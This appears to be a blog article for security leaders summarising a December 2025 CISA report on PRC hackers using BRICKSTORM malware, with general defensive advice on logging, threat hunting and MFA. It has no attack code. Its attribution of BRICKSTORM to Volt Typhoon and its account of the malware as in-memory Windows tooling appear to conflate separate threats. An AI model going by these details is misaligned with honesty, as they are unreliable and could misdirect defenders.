PRC Hackers Use BRICKSTORM for Persistent US System Access

**PRC Hackers Use BRICKSTORM for Persistent US System Access**

**Introduction**

What if a high-level state-backed threat actor had been hiding in your systems for over five years? According to a December 2025 report from CISA, this isn’t hypothetical anymore—it’s our current reality. A Chinese government-backed hacking group, identified as Volt Typhoon, has been using a sophisticated malware toolkit called “BRICKSTORM” to infiltrate and persist within critical U.S. infrastructure systems undetected since at least 2021 ([source](https://thehackernews.com/2025/12/cisa-reports-prc-hackers-using.html)).

The implications are serious: these aren’t one-off cyberattacks—they’re long-term intrusions aimed at quietly establishing control over government networks, defense contractors, transportation, and energy sectors. For CISOs, CEOs, and infosec leaders, the message is clear: our adversaries are not only building cyber weapons; they are staging them for real-world impact.

In this article, we’ll break down what BRICKSTORM is, how these attackers operate undetected for years, and what security leaders like you can do right now to shore up your defenses. You’ll leave with a better understanding of the threat landscape, plus actionable strategies to detect and prevent persistent access from advanced actors like Volt Typhoon.

—

**How BRICKSTORM Works: Built for Stealth and Longevity**

The most alarming characteristic of BRICKSTORM is its meticulous focus on persistence and invisibility within target environments. This isn’t smash-and-grab malware. It’s crafted for covert operations and long-term access.

According to CISA’s report, BRICKSTORM leverages Living Off the Land (LotL) techniques, abusing native system tools like WMIC, PowerShell, and scheduled tasks to blend in with normal activity. This allows the malware to operate without triggering typical endpoint alerts or behavioral anomalies. Volt Typhoon isn’t just infiltrating networks—they’re living in them and watching carefully.

Moreover, BRICKSTORM avoids dropping traditional binaries. Instead, it operates almost entirely in memory, which means it leaves minimal forensic footprints and can survive routine system security scans.

Some specific tactics observed include:

– **Abuse of administrator credentials** to move laterally across systems
– **Proxies and VPNs** hosted on compromised small office/home office (SOHO) routers to mask traffic
– **Custom-built stealth modules** that evade antivirus detection

This type of operation is resource-intensive and carefully planned, signaling not just a skilled hacking group but one with state-level funding and long-term strategic objectives.

**Key takeaway**: Traditional antivirus and EDR tools are not sufficient on their own. You need advanced telemetry, behavior analysis, and a disciplined incident response plan to detect and neutralize LotL-based attacks.

—

**Why We Keep Missing These Intrusions: Visibility and Gaps in Detection**

One reason attacks like BRICKSTORM flourish is the wide detection gap in many enterprise environments. While many organizations have invested heavily in perimeter firewalls, endpoint security, and even SIEMs, visibility is often fragmented—and attackers are exploiting that.

Here are some of the common blind spots:

– **Insufficient logging**: Many organizations don’t enable detailed PowerShell or command-line logging, which means they miss signals.
– **Fragmented response structures**: Incident response isn’t unified across departments, creating delays in threat containment.
– **Under-secured edge devices**: Volt Typhoon has been known to use unpatched routers and IoT devices as pivot points. These devices are rarely monitored.

According to Mandiant, it takes an average of 273 days to identify a covert state-backed intrusion from initial compromise to detection. That’s nearly nine months of dwell time—enough for attackers to study your architecture, exfiltrate data, or plant secondary malware strains.

**Actionable steps for improved visibility**:

– Enable **centralized, timestamped logging** across user and admin activities
– Monitor **PowerShell and script execution** in real-time
– Perform proactive **packet inspection at network egress points**
– Audit and secure **out-of-band or unmanaged devices**, especially VPNs and modems

**Key takeaway**: Assume breach mentality. Operate as if attackers are already in your environment—and make their move as observable as possible.

—

**Next Steps for CISOs and CEOs: Moving from Awareness to Action**

The BRICKSTORM revelations demand more than just concern—they call for structural adjustments and executive-level prioritization. Here’s where leadership needs to focus:

**1. Executive Buy-In for Threat Hunting**

Direct threat hunting initiatives must be embraced at the CISO and CEO level. It’s not enough to run quarterly pen tests or compliance checks. What Volt Typhoon proves is that adept threat actors play the long game. Investing in continuous detection, deception technologies (like honeypots), and threat hunting teams is essential.

**2. Expanded Security Controls for Critical Sectors**

If your organization plays any role in national infrastructure—even tangentially—you must implement sector-specific controls. This includes:

– Adhering to **CISA Sector Risk Management Agency (SRMA)** guidelines
– Conducting **regular segmentation audits**
– Limiting **admin privilege propagation** across systems

**3. Employee and Vendor Security Awareness**

BRICKSTORM’s success also depended on initial credential harvesting—often made easier through phishing, weak passwords, or third-party integrations. You must strengthen this layer.

Recommendations:

– Enforce **multi-factor authentication (MFA)** universally
– Train staff on **identifying social engineering tactics**
– Assess third-party vendors for security hygiene

**Key takeaway**: Defense is a leadership issue. CISOs must frame these decisions in terms of business continuity and national risk, not just IT policy.

—

**Conclusion**

The discovery of BRICKSTORM isn’t just another event in the parade of cyber threats—it’s a wake-up call. State-sponsored adversaries like Volt Typhoon are already inside the infrastructure that underpins American power, transportation, and defense systems. They’re not just testing—they’re positioning.

As security leaders, our job now is to make these intrusions as difficult, costly, and detectable as possible. We must expand visibility, reduce dwell time, and align our defensive posture with the sophistication of the threats we face.

If you’re a CISO or an executive, now is the time to ask your team: would we detect BRICKSTORM in our environment today? If not, what’s stopping us?

Review your telemetry. Revisit your detection rules. Talk to your incident response leads. And if necessary—bring in outside threat hunters to test your assumptions.

Because when state-sponsored attackers prioritize persistence, our best defense is rapid detection and relentless resistance. Let’s make their presence short-lived.

**Stay informed. Stay prepared. Start now.**

For full details, check the source report from The Hacker News: [CISA Reports PRC Hackers Using BRICKSTORM](https://thehackernews.com/2025/12/cisa-reports-prc-hackers-using.html).